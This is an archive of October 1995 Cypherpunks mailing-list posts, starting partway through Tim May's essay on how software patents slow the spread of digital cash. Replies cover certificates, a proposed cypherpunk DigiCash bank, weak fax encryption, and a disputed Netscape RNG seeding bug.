improved upon, etc. by the software industry. Ted Kaehler of Apple once
told me that an H-P analyst/thinker came up with this sort of analysis of
why there is no "software IC" industry to parallel the actual IC industry.
He argues that there is no "learning curve" for software, in the way there
is for physical objects. Sorry, I don't recall his name. If I were pursuing
this essay here as an actual, researched paper, I would dig up this guy's
analysis. Also, Brad Cox has done a lot of work on "software ICs"--he
coined the term, in fact--and his papers are worth looking at.)


HOW THIS APPLIES TO THE CRYPTO COMMUNITY

Contrast this with the following "software patent" situations, the ones
directly relating to our crypto community:

1. The public key and RSA patents. RSADSI (and I'm ignoring for now the
implications of the PKP/Cylink complication) wants to see intended
applications and to work out arrangements for license payment based on
profits, volume, effects on their other licensees, etc. This limits the
ways in which the RSADSI patents have been incorporated into evolutionary
and revolutionary products.

2. The Chaum Digicash patents. Digicash wants $150K upfront, plus 10% of
profits. (Cf. Adam Back's posting on this today.) Digicash has their own
particular version they are pushing, but others are effectively shut out of
developing experimental applications. Imagine the situation if the garage
shop developers of personal computers had been forced to pay Intel up front
for the right to design in an 8008 or 8080 microprocessor, and then promise
to pay 10% of their profits to Intel (and 5% to the power supply vendor, 8%
to the keyboard supplier, 4% to the capacitor makers, 9% to the memory chip
companies, and so on....).

In both of these cases, the confusing, complicating, and almost
insurmountable issue is that these conditions are very hard to meet. It's
not just the issue of sharing a business plan with RSADSI or Digicash, it's
the fact that many aspects of one's business are unknown: the viability,
the volume, the future products, etc. The "garage shop" folks usually can't
even get in the door to talk to these companies.


THE REAL ISSUE: TRANSACTION COSTS ARE THWARTING EVOLUTIONARY DEVELOPMENT

To me, the issue of concern is not that "software ideas should not be
patented." After all, why should the _idea_ of a safety pin or a windshield
wiper be any more patentable than the idea for a blinded transaction?

Rather, the issue of concern is that the patents on the software ideas and
concepts mean that experimenters, developers, and hackers cannot buy a
license for digicash the way they would buy some ICs and then experiment,
develop, and hack. Another way of looking at this is that _transaction
costs_ are too high and are thwarting normal evolutionary development. The
guy in the garage trying to develop a "digital postage stamp," for example,
can't use the Chaumian blinding protocols without hiring lawyers, paying
Chaum his up-front fee, and laying out his designs and business plans
(which he very probably doesn't even have!).

(Clarification: I'm not saying one can't buy fairly cheap RSA versions,
such as the code in RSAREF. What I'm saying is that one can't get a "core
module" for digicash, for example, and then test out the market with
various implementations, going into volume production with the ones that
are most successful.)

(And you can perhaps tell from my views here that I am not vilifying
either RSADSI or Digicash here for their policies: they are trying to make
a reasonable profit in the face of a situation very much unlike the
situation faced for physical objects like microprocessors. David Chaum
points out that "there is no digital coin." Likewise, there is no "software
coin," and so the developers of novel ideas cannot "reify" the ideas in
things they can sell...rather, we see the current approach of convoluted
and restrictive licensing contracts. They try to make up for the lack of a
"software coin" by grilling potential customers about their expected
markets and by setting up complicated contracts to ensure--they
think--enough profits.)


EVOLUTION

What do I mean by "freezing" the evolution of products? Take the case of
Digicash and their test release.

As I pointed out in a recent essay ("Crypto + Economics + AI = Digital
Money Economies"), we are _impoverished_ with regard to the basic building
blocks we have for a digital money system. Where are the equivalents of
what we find necessary in the existing financial world?

Does anybody think that a particular instance of digital cash is the end
state of the evolution of digital cash? It is likely just the beginning.

But by the licensing of particular systems, and by having convoluted and
restrictive arrangements for use of the patents, the evolution of digital
money and crypto systems grinds to a halt. Instead of having dozens of
implementations of digital cash systems (I mean real digital cash systems,
embodying the Chaumian or Brandsian blinding schemes, not the cheesy
"smartcard" systems that are carelessly called "digital cash"), we have only
a very few: a road toll system here, a play money experiment there, etc.

Evolution works by _differential reproduction_ (often misleadingly called
"survival of the fittest"). Several dozen variants of personal computers
are introduced (Sphere, Altair, Imsai, Sol, Exidy, Pet, Apple I, Apple II,
IBM PC, Macintosh, etc.), and customers reward the ones they like with
increased sales, causing the "genes" (or memes) of the winning products and
companies and designers to propagate.

The ability to incorporate PGP into tools and objects without complicated
entanglements is one reason PGP did so well. It was a "building block" that
anybody could build into other tools and objects, without regard for how
big the market might be for their tools, without regard to what other users
were doing, etc. (I'm ignoring for the moment any claims RSADSI may have
had that PGP infringed.)


CONCLUSIONS

Both the public key and digital cash situations are being affected by this
inability of people to use the core ideas as building blocks for more
complicated--or more revolutionary--systems. It's as if Intel had, in 1971,
insisted that all designs be approved by them, and that chips could not be
sold to competitors who had already licensed the chips, and that 10% of all
profits be ceded to Intel. This would likely have had a big effect on the
explosion of applications that came about in the years since the micro's
introduction.

Do I have a solution for RSADSI, Cylink, Digicash, and others? Given that
there is no "software coin," my hunch is that no simple solution exists.

To take David Chaum's case in particular, I think he'll end up making a lot
more money by being the guru and consultant on digital money systems (the
inventor of a field and all) than by having licensing schemes which are
probably unenforceable and which are mostly slowing down the evolution of
the bits and pieces needed for true digital money economies.

I've had these ideas swirling in my head for a long time, and thought it
was time to share them with you folks.

Comments are welcome.


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 7 Oct 95 10:37:00 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Supercomputer export ease
In-Reply-To: <9510061437.AA18425@sulphur.osf.org>
Message-ID: <Pine.SUN.3.91.951007133250.4328B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


The policy always made nearly as much sense as the crypto export 
restriction. My favourite r.a.a. was one I heard about when I was working 
as a unix admin at the Technion. The rules forbid exporting a four 
processor Convex, but had no problems with two two processor models. 

Simon

Contract with America - Explained!			|Phone: +44-81-500-3000
Contract: verb						|Mail: ses@unc.edu
1) To shrink or reduce in size - the economy contracted +-----------------------
2) To become infected -My baby contracted pneumonia when they stopped my welfare





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 7 Oct 95 10:48:21 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510060440.VAA23299@jobe.shell.portal.com>
Message-ID: <199510071748.NAA09738@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> Bob Smart <smart@mel.dit.csiro.au> writes:
> >Consider the IPSEC case. The current situation is:
> 
> >1. We go through some process, let's call it Process A, where we determine
> >   that we want to talk to IP address 192.9.8.7.
> 
> This would be, say, a DNS lookup on www.egghead.com.

Just thought I'd point out that IPSEC isn't in general going to use
host keys. It's designed to be more general, and I hope that it ends up
being used much more like Kerberos -- i.e. well known service keys and
user keys.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sat, 7 Oct 95 14:39:25 PDT
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: Revised CJR
In-Reply-To: <199510070003.RAA12771@kiwi.cs.berkeley.edu>
Message-ID: <Pine.ULT.3.91.951007163815.16906B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 6 Oct 1995, Raph Levien wrote:

> SPECIAL CHARACTERISTICS
> 
> There are no military standards or specifications that this t-shirt is
> designed to meet. There are no special characteristics of the t-shirt,
> including no radiation-hardening, no ballistic protection, no hard
            ^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^
> points (the t-shirt is only available in soft 100% cotton), no TEMPEST
  ^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> capability, no thermal and no infrared signature reduction capability
> (in excess of that provided by a typical black cotton t-shirt), no
> surveillance, and no intelligence gathering capability. The t-shirt
> does not use image intensification tubes.

Oh I love it.  A warm kudo for whoever came up with the above wording (as 
well as the rest of the paragraph). :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMHbXnDokqlyVGmCFAQGaNwQAxqLhHyWK/lRgcBSc9NfJGddOOmLAo0ky
YTIVhsPttadIUUR9pnCZAx6j5dIsPtastkQBF8kMFikI32emUSEXOEws4Irn3cQe
Og3fyRoN6fGIZUrDTHtn8uz//m9MRnLbl0lbYRhrBeToQoZhkTKb+YpZqLf3G1SF
w/ddiKG/Z6s=
=Yxye
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Oct 95 15:08:13 PDT
To: cypherpunks@toad.com
Subject: HOW_ler
Message-ID: <199510072208.SAA25389@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Economist of Oct 7-13 grins at Net banks and smirks at
   their telecomms bedding wetting betting, titters at the
   "French hacker's" 120-comp hoist of Netscape and the
   Russky's heist of Citibank, and knee-slaps at the
   "slanging" match of hateful yoked-oxen Visa and MasterCard
   dragging long ropes of intertwined shit.


   HOW_ler












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 7 Oct 95 10:27:54 PDT
To: ecm@ai.mit.edu
Subject: cypherpunks digicash bank?
Message-ID: <15811.9510071727@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Re the attempts to get a practical DigiCash system moving with the
unofficial exchanges at the two exchanges:

	http://www.c2.org/~mark/ecash/ecash.html
	http://www.firecloud.com/eshop/eshop.htm

plus people participating on the ecm mailing list

	http://www.ai.mit.edu/people/lethin/ecm/

one of the major problems which crops up in discussion is that there
is no guaranteed future for the current issue of Digicash, ie it
relies on the digicash trial, and DigiCash's continuation in running
this server.

...

One solution would be for some one, a group of cypherpunks, or
individual cypherpunk, a startup company, to actually license the
technology from Chaum.  It has always puzzled me as to why Chaum
hadn't taken this approach himself.

- From what I've read in previous discussions, the price is $150k, plus
10% of profits.  Other than that what is required is presumably a
dealership in the major credit cards (VISA/mastercard, etc), a secure
WWW server (to allow on-line purchase of c$), or simply PGP signed,
encrypted emailed purchase instructions, and a good internet
connection.  Also some legal consultations to check if setting up such
a system - payee anonymous, would be ok in the US.  Or perhaps another
jurisdiction if this was a sticking point.  Work out anonymous
gateways to things like MSN electronic cheques later :-)

It strikes me that none of these things are insurmountable, and that
the resulting system could become very popular, as well as furthering
the cypherpunks cause - in the sense of having good cryptographic
system in place, which would hopefully attain wide use.

All that would be needed would be the internet connect (which some
folks have already?), VISA/mastercard (same folks might have already?)
$200k ($50k to honour existing digicash currency, at 5c$ to 100 US$ +
$150k for license), a well secured host, and lots of work.  Start
small, that's my motto, no need to go investing more than that until
the thing's started, and bringing money.  As, and if, it brings in
money, use that to buy better net connect, server hardware, etc.

I'd have thought the way to do it would be for the bank to link the
currency directly to a physical currency, US$ say, and to keep the
interest on the c$ currency in circulation, as profits.  Maybe not the
way to make the most money, but then that's the advantage the civilian
sector has over big banks :-) 100% real-currency backed, so that it
would be impossible to have a run on the bank.  Also a nice way to run
it, as there are no apparent charges for using the cash, or licensing
clients (aka you hand out clients willy nilly for free, like the
netscape model which seems to work so well).

I'm serious, and would want to invest in it.

So what say?  1st digicash bank, *run*, and owned by a group of
cypherpunks?

Adam
- --
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMHa4dynIuJ1VakpnAQHaTwQAkgxtQKc1gzTmN8+bZGRk4sgB1pkGBLlh
HJqgE8VqLLmkWy5LufLsvZt0GybylyEqt1fNxK7P0FPpJ6S5+n8F+I43t3U3RpJe
yQAJdKbQtmKzdEWsoogYQRo4b6ZxJG2o6O0I3u+oBC/TVco5WypHlO40ge59MI/f
BSGh9R2mQQA=
=pdta
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Herb Sutter <herbs@interlog.com>
Date: Sat, 7 Oct 95 15:58:30 PDT
To: "Jim Grubs (W8GRT)" <jgrubs@webcasters.com>
Subject: Re: Kerserver keyrings
Message-ID: <199510072256.SAA19213@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


Because this problem is occurring more and more often (and only from people
on Cypherpunks), I'm cc'ing the list in general this time... please adjust
your mailers if possible:

At 12:41 1995.10.07 -0500, Jim Grubs (W8GRT) wrote:
>-- [ From: Jim Grubs (W8GRT) * EMC.Ver #2.5.02 ] --
> Attachment: mailsig Code: 0006727      \ Created: 10-03-95, 07:16 PM [1 Kb]
>
>Someone at Uni-Hamburg must have seen my message and said, "Oops, who turned
>that off?" Anyway, their keyring was updated today. It's 6.4 megs!!!! (My
>first HD was only 10.)
>
>Attachment Converted: E:\WINAPPS\INTERNET\EUDORA\mailsig

Your .sig comes through as an attachment (for Eudora users).  Could you
please fix this?  Thanks.

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Oct 95 17:29:04 PDT
To: cypherpunks@toad.com
Subject: Noise: anyone experience with brain waves input devices (IBVA,...)
Message-ID: <199510080030.UAA08506@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've sent the full version of the article below to Laurent.  
Anybody else want it, send a MIN_wav.

----------

   [Excerpts]

   Financial Times, September 27, 1995

   When it's all in the mind


   At the department of medical informatics at Graz
   University of Technology in Austria, Gert Pfurtscheller is
   working on a project that could result in
   thought-controlled devices.

   Stephen Roberts, a researcher at the electrical and
   electronics engineering department at Imperial College
   London, has worked with Pfurtscheller's team. He hopes to
   improve the signal classification accuracy by using
   artificial neural networks, computer-based systems designed
   to mimic the way the human brain works.

   Roberts's work is part of an EU research programme called
   Anndee (Artificial Neural Networks for Diagnosis and
   Enhancement of EEG) which involves around 30 researchers in
   a dozen European universities.

   The Consciousness Research laboratory at the University of
   Nevada is pursuing a more controversial line of research
   into psychic phenomena or, as its director, Dean Radin,
   prefers to call it, Direct Man/Machine Interaction (DMMI).
   A number of Japanese companies including NEC and
   Matsushita, have also conducted research into DMMI. Radin
   believes that in 20 to 50 years' time, it will be possible
   to use DMMI to operate devices.

   The technology company The Other 90 Per Cent, based in
   Sausalito, California, has developed MindDrive, a computer
   games system whose programs are controlled by thought.

   MindDrive is designed to work with most IBM-compatible
   personal computers. A console, which analyses the user's
   brain waves, plugs into the back of the computer. Users
   wear a sensor sleeve over their index finger. At present,
   the system can only be used to move a cursor up and down.
   MindDrive will be on sale in the US early next year. The
   console will cost between $100 (65 pounds) to $200, and
   MindDrive games some of which will enable users to create
   music or draw on a computer screen by thought, will cost
   around $30 to $40 each.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 7 Oct 95 05:28:07 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: CancelMoose = William Nagengast?
In-Reply-To: <ac9b4284310210042b5f@[205.199.118.202]>
Message-ID: <199510071051.AA37781@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>However, after a little further investigation, I don't think it really
>>is Mr. Nagengast. It actually appears that panix.com is running a
>>little remailer. As Dave Winer would say, cooooool.
>>You're right. My sincerest apologies.

>Well, presuming that the two anonymous parties are the same, I'm impressed
>that Anonymous was fairly graceful in his comments here.
>Too bad we don't know who she or he is.

#define paranoia on

Just ask your local TLA that has traffic monitors on the up and down links of
all the remailers so they can track a piece of email from sender to recipient.
They will take the (relatively small) logs of the hour and pump out a name
for you.

#define paranoia off

:)
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 7 Oct 95 22:15:50 PDT
To: cypherpunks@toad.com
Subject: Re: MITM attacks and True Names (again...)
Message-ID: <199510080515.WAA13191@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:02 PM 10/6/95 -0600, bryce@colorado.edu wrote:
>(As an aside I fully sympathize with those who rail against the popular
>(?) impression that a True Name is somehow necessary to communication.
>That is a dangerous idea, since all a True Name is really necessary for
>is violence.  (And, pending certain eagerly-awaited technological
>developments, for sex.))

That's incorrect - it can also be necessary for _avoiding_ violence.
You don't need a full True Name for that, but you do need an accurate
partition of the namespace into those entities who will, won't, or might
come and beat you up based on what you say.  Thus, if you're talking to
Subcommandante Marcos about your plans for overthrowing the governor,
you don't need to know his True Name, but you do need to know if he's a cop;
anybody doing a successful MITM job on your data communications probably is.

Similarly, if you're in the pharmaceutical retail business and talking to
your wholesaler, you may even want to avoid knowing his True Name, but you
not only want to know if he's a cop, but you may want to know whether,
if you show up at the appointed physical location with your physical body,
you'll be met by just him (with his merchandise), or by other people as well
(eavesdroppers using MITM because it's easier than cracking crypto),
or by one of his or your competitors trying to rip you off.
(You'd also like to know if you'll be met by him without his merchandise,
but with his big ugly friends, which is why you plan to meet him in a 
public place...)




-----BEGIN PGP SIGNATURE-----
Version: 2.7.1
Comment: PGP available outside U.S.A. at ftp.ox.ac.uk

iQBVAwUBMHdVcPthU5e7emAFAQHRNwH9ErIcbgioSJOD5270SJ2hRfycNd6sMAj3
Q5jzguJVkbmsrI9I85eB/caV9UOOkSTX29v3gTAHWbeNuAL9t/Yyrw==
=3qir
-----END PGP SIGNATURE-----
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Smart <smart@mel.dit.csiro.au>
Date: Sat, 7 Oct 95 05:23:45 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510060440.VAA23299@jobe.shell.portal.com>
Message-ID: <199510071223.AA14467@shark.mel.dit.csiro.au>
MIME-Version: 1.0
Content-Type: text/plain


The key-centric scheme is not inconsistent with the use of names. Universal
names are useful in directories and private names are useful ways for
individuals to name public keys that are important. The key-centric view 
is not name-free. The difference is just this: Are attributes attached 
to keys or names?

In any public key system, however long your certificate chain at the
end of that chain there has to be a public key you trust. It can't be
a name it has to be a key. So even the most name-centric system has
a key-centric core. 

 > >1. We go through some process, let's call it Process A, where we determine
 > >   that we want to talk to IP address 192.9.8.7.
 > 
 > This would be, say, a DNS lookup on www.egghead.com.

That picks a process where there is no significant difference. But 
consider another common case. We are running a server that accepts
connections from anyone. We get a connect packet from 192.9.8.7. So
that is how we determine that we want to talk to 192.9.8.7: in order
to serve it.

In the standard view we now do a reverse lookup to get a name then
go to the DNS again to get the public key associated with that name.
And yet we don't care who we are talking to, and we don't need or
want to have to work out whether we trust the certificate. There was 
no reason why we couldn't have just had a secure conversation without 
ever doing any directory lookups.

I have seen it asserted that we would never want to have a secure 
conversation with someone when we don't know who they are. I strongly 
disagree with that. Suppose in our example that our server sells 
alcohol in exchange for digital cash:

 a. We want the sequence of packets from our purchaser to be authenticated.
    We don't want some humourist doubling the order or otherwise
    corrupting it.

 b. The purchaser is entitled to a private (encrypted) conversation.
    For example maybe he is Islamic and doesn't want his religious
    brethren on his ethernet to know about his alcohol purchases.

Now another aspect is that you need to be over 18 to buy alcohol
[in Australia]. So the purchaser has to present a certificate signed
by the appropriate authority saying that the owner of the public key
is over 18. But note that in the key-centric world the liquor seller
doesn't have to know who the purchaser is. The certificate that says
you are over 18 is a separate thing, not mixed up in an X.509 v3
certificate that also has your name, address and sexual preference.

So a question: you are the liquor seller. How do you want the information
about the "appropriate authority" that signs those "over 18" certificates? 
Do you want a name that can give you an X.509 certificate and a certificate 
chain from a directory service? Or do you think you should get hold of the
public key yourself in some way that gives you real confidence?

Bob Smart




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 7 Oct 95 22:24:46 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks digicash bank?
Message-ID: <v02120d02ac9d1e825159@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I strongly recommend that anyone considering licensing from Chaum
first read my paper on some interesting aspects of his basic blinding
patent. The paper is at: http://www.communities.com/paper/agnostic.html.

I will be putting up another short paper on anonymous currency
management within the next few days.

Also, I strongly recommend that anyone serious about this not use the
word "bank", and take the time to figure out how to structure the
service as an NBFI (non-banking financial institution) and not a "bank".
Note that NBFIs are still regulated, and you will, at minimum, need to
consult with your state banking regulators as well as the IRS (who
also regulate money transmitters, i.e. issuers of traveller's checks,
moneygrams, etc.) Note that the BSA (Bank _non_ Secrecy Act) does in fact
apply to NBFIs and money transmitters, and you should be sure to educate
yourself as to the implications of this.

I will be covering some aspects of these issues at length in my trip
report on the anti-money-laundering conference I recently attended,
which was a real eye-opener in a number of ways.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 8 Oct 95 00:18:06 PDT
To: privsoft@ix.netcom.com (Steve )
Subject: Re: Graphic encryption
Message-ID: <199510080717.AAA02124@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:17 AM 10/6/95 -0700, privsoft@ix.netcom.com (Steve ) wrote:
>Also if any of ya'll are familiar with graphic encryption, I am looking 
>for opinions as to its strengths / weaknesses.

While normally I'd agree with Lucky Green and say that a good encryption
algorithm's strength is independent of its input data, there are exceptions.

The description of Privasoft's method on their web page sounded like* it
broke up a fax image into little squares and shuffled them around based on
some proprietary (hence presumably weak) algorithm, somewhat like feeding
them to a shredder or puzzle-box, then put them in a file you can ship
with regular fax software or decrypt yourself.  If that's the case,
and if the squares are sufficiently big to have enough pixels for fax
software to compress decently, then it's weak no matter _how_ strong
the encryption algorithm that shuffles them is, because you can piece together
matching edges like a jigsaw puzzle, or like a bunch of Iranian students
with American Embassy shredded documents.  Using computers is a lot easier,
since you've got precise images of print - most edges will match pretty well
with the edges of the adjacent squares, and you can jigsaw the parts that
still need work if you get too many multiple matches.  

A much stronger way to encrypt faxes is to do the Group 3 (or G4) compression
first, then encrypt using a real algorithm, ship the (now-useless-for-fax)
encrypted bits, decrypt, and read with your favorite fax-image viewer.
Or, of course, take the raw file you would have done this with, which is much
smaller than the fax-compressed image, encrypt it, ship, decrypt, and view,
but that means the person on the far end needs the same word-processor.


-------
* The software was on the web page; if I'd had spare disk space that day and
some slack time I could have downloaded the demo version and tried it,
but this is what the description sounded like it meant.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 8 Oct 95 00:18:17 PDT
To: cypherpunks@toad.com
Subject: Certification Authorities in history.
Message-ID: <199510080718.AAA02155@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May (or somebody like him, or Tim the Enchanted) wrote:
>> The talk of certification authorities is OK, so long as the practice is
>> _completely_  and "strongly" voluntary (*).

It occurred to me that the authors of the US Constitution had 
direct experience with the equivalent of mandatory certification hierarchies
for legally acceptable digital signatures.

They called it "The Stamp Act".  

If you wanted to make a legal document, such as a contract or will, 
it needed to be on paper with a tax stamp on it; I forget if this was
a watermark or a stick-on stamp, but you could only get it from the authorities.

They didn't like it.  There was also a few-percent sales tax on tea around
that time.  They didn't like that either :-)


--------
</serious_mode>
<Don_Hopkins_Monty_Python_Voice> 
<i> WHAT </i> is your name?
<i> WHAT </i> is your certificate number?
</Don_Hopkins_Monty_Python_Voice> 
<serious_mode>
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 7 Oct 95 16:30:57 PDT
To: Herb Sutter <herbs@interlog.com>
Subject: NOISE eudora [was Re: Kerserver keyrings]
In-Reply-To: <199510072256.SAA19213@gold.interlog.com>
Message-ID: <9510072330.AA01830@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



begin 644 eudora_sucks
because eudora is lame or ill configured is not a reason to
pollute the list...
ps1: yes the first poster binary .sig was a ill too
ps2: yes I'm polluting too but those "mailer wars" are getting boring
ps3: I wonder if this message crashes eudora ;-) ! \/~!`
`
end

--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Kennedy Serbian PGP Qaddafi Kaser Sose arrangements break




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sat, 7 Oct 95 17:06:31 PDT
To: cypherpunks@toad.com
Subject: Noise: anyone experience with brain waves input devices (IBVA,...)
Message-ID: <9510080007.AA01951@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I'd like to know if anyone has first hand experience with brain wave
and other (hyped) input devices like IBVA or others and/or pointers to
information?

sorry for the little relevance to crypto, but I expect the share
of geeks and nerds on the list to increase my chance to get an answer :-)
{
 the military folks are welcome to answer too... i will receive
 anonymously posted classified documents on the subject with pleasure :-)
 and reference to published work too [plane's brain interfaces,...]
}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Clinton [Hello to all my fans in domestic surveillance] NSA Kaser Sose
Treasury FBI Marxist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Sun, 8 Oct 95 01:39:18 PDT
To: cypherpunks@toad.com
Subject: Re: NEW Netscape RNG hole
In-Reply-To: <9510080732.AA14015@anon.penet.fi>
Message-ID: <30778E3D.4CBD@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


RingZero wrote:
> 
> Did anyone else notice a bug in the new, public Netscape
> RNG code? It appears that on Windows builds, during the
> RNG seeding, the function that hashes in file contents
> (EnumSystemFiles) doesn't close a file handle (lFileHandle).

I think you mean lFindHandle. I'm not a windows programmer, so I have
no idea if the enumerator needs to be cleaned up, but I will forward
your message to the appropriate folks here.

> This doesn't hurt too badly on the client, but on a server,
> leaking these resources is deadly.

Not really. SEC_SystemInfoForRNG is called ONCE for each execution.
This is true for servers and for clients. Did you rig up a test
bed that called SEC_SystemInfoForRNG in a loop? In addition, if
the server cannot open any more files, it will have difficulty
delivering any information (compromised or not) to any clients.

The clients use the SEC_GetNoise data each time they go idle to
re-initialize the PRNG seed. The servers also re-initialize the
PRNG seed periodically. That function does not use any file
handles.

> I ran some experiments. It took a few thousand calls before
> these open file handles forced not only the file content function
> to fail, but also made OTHER calls quietly fail. With these calls
> quietly failing, the RNG is significantly weakened. In my tests
> on Windows NT, ALL of the following RNG functions failed:
> 
> * GetComputerName
> * GetVolumeInformation
>         volume Name,
>         volume Serial Number,
>         Maximum Filename Length
>         Filesystem Flags
>         Filesystem Name
> * GetDiskFreeSpace
>         SectorsPerCluster
>         BytesPerSector
>         Free Clusters
>         Total Clusters
> * subroutine for the inclusion of system files, both number of them & contents
>         ReadSystemFiles()
> * subroutine used for other history file accesses
>         SEC_FileForRNG(*filename)

SEC_FileForRNG does close every file it opens. As I said before,
I don't know what the rules are for closing the enumerators.
 
> How did this get past Netscape testers?

The tested servers worked? :-)

> Does anyone
> know if this was fixed before Netscape shipped?

The code that was made available for download was the same that
was in the shipped updates.

> Does
> it rate a shirt, or does this mean  Jeff W. gets to shave his
> head? I seem to remember him promising to shave it if we
> could show a significant weakness in the new RNG code,
> and since this does (IMO)...

That was me (Phil Karlton) and not Jeff who put his locks (pun intended)
at risk. You haven't demonstrated to me that there is significant
weakness. I'll keep my hair for another day.

